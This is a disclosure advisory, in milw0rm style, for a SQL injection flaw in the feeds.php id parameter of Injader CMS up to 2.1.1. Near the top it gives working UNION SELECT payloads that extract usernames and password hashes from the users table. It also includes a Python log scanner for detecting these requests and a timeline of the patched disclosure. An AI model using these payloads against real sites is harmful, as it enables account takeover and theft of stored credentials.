Injader CMS
http://www.injader.com/

- <= 2.1.1 -

- SQL -
http://localhost/upload/feeds.php?name=articles&id=<SQL>
magic_quotes_gpc = Off
register_globals = On

Username (urlencode):
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 2511=2511

Pass:
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(userpass AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 8758=8758
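
A defender-side check for this bug, as an added example that is not part of the original advisory: it scans web access-log lines for feeds.php requests whose id parameter is not a plain integer, which is what the injection above relies on. The log lines, the classify/scan names and the verdict labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined-log style (documentation IPs).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Dec/2008:10:00:01 +0000] '
    '"GET /upload/feeds.php?name=articles&id=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Dec/2008:10:00:05 +0000] '
    '"GET /upload/feeds.php?name=articles&id=2%20UNION%20ALL%20SELECT%20NULL'
    '%2CNULL%20FROM%20maj_users%23 HTTP/1.1" 200 812',
    '198.51.100.7 - - [18/Dec/2008:10:00:09 +0000] '
    '"GET /upload/feeds.php?name=articles&id=2%27 HTTP/1.1" 200 0',
    '192.0.2.10 - - [18/Dec/2008:10:00:12 +0000] '
    '"GET /upload/index.php?id=abc HTTP/1.1" 200 901',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
SQL_HINT_RE = re.compile(r"\b(?:union|select|concat|cast|from)\b|#|--|/\*", re.I)


def classify(line):
    """Return (client, verdict, id_value) for a feeds.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.endswith("/feeds.php"):
        return None
    # parse_qs URL-decodes values, so %20/%23-encoded payloads are seen in clear.
    ids = parse_qs(url.query, keep_blank_values=True).get("id", [])
    if not ids:
        return (client, "ok", "")
    if len(ids) == 1 and re.fullmatch(r"[0-9]+", ids[0]):
        return (client, "ok", ids[0])
    value = " ".join(ids)  # repeated id parameters are treated as one value
    verdict = "sqli" if SQL_HINT_RE.search(value) else "non-numeric"
    return (client, verdict, value)


def scan(lines):
    """Return every feeds.php request whose id is not a plain integer."""
    hits = (classify(line) for line in lines)
    return [h for h in hits if h and h[1] != "ok"]
```

Access logs only show the query string; with register_globals = On the same variable can also arrive in a POST body or cookie, which this check does not see.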

- Timeline -
Author notified: Nov 30, Dec 09,10
Injader 2.1.2: Dec 12
Public disclosure: Dec 18

- Seasons Greetings -
- http://nukeit.org -

# milw0rm.com [2008-12-18]